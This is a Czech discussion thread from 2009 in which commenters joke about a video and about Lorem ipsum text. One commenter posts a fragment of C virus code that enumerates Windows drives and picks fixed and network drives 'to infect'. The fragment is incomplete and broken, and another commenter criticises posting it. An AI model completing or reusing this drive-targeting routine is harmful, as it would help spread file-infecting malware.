
Pravidla diskuze    |    Zobrazit lame příspěvky
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pr0ph3t16.3.2009 16:53 | #
djh_: Lorem ipsum to neni.

Zhruba 50. vterina napriklad ;-)

Googlito ergo sum!

public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");

sL | 81.27.198.*16.3.2009 11:53 | #
cP | 202.134.80.*16.3.2009 10:47 | #
makak: erm ? myslim ze tohle uz je vec kterou si antiviry hlidaj o neco vic, po incidentech s autorun.ini... nechapu proc to sem pises ? je pravda ze na svoji jednoduchost kody tohodle typu byli docela ucinne, ale kdyz uz tak jsi mohl pastnout source nejakyho(svyho?) celyho worma.
Antrax.megashit.... | 213.226.240.*16.3.2009 9:09 | #
To by melo hlubokej smysl... :D
djh_ | 213.211.34.*16.3.2009 8:57 | #
eeh.. ten text dole.. to je z Lorem ipsum generatoru?
.( | ) | 90.176.138.*16.3.2009 7:22 | #
kurna, kus prasackeho kodu v 1:14.... zase nejakej hekr

... protego sanctus causa, padre illuminata, gloria in unum diem
makak | 193.200.150.*16.3.2009 1:14 | #
DWORD WINAPI SearchDrives()
DWORD Drives;
BYTE CurrentDrive[] = "A:\\";
DWORD DriveType;

Drives = GetLogicalDrives();
for (i=0; i<sizeof(DWORD); i++)
if (Drives & (1<<i)) // Drive present?
CurrentDrive[0] = 'A' + i;
DriveType = GetDriveType(CurrentDrive);
// Only infect files in Fixed and Network Drives
if ((DriveType == DRIVE_FIXED) || (DriveType == DRIVE_REMOTE))
return 1;
Antrax.megashit | E-mail15.3.2009 23:32 | #
DjH | E-mail | Website | ICQ 319-960-89515.3.2009 22:59 | #
jak? normalne, umejvame si pracky 20x denne a sme paranoidni ;)

..:@]> [link] <[@:..
mr.Crow. | 213.211.34.*15.3.2009 21:29 | #
jak to děláte? 19 :(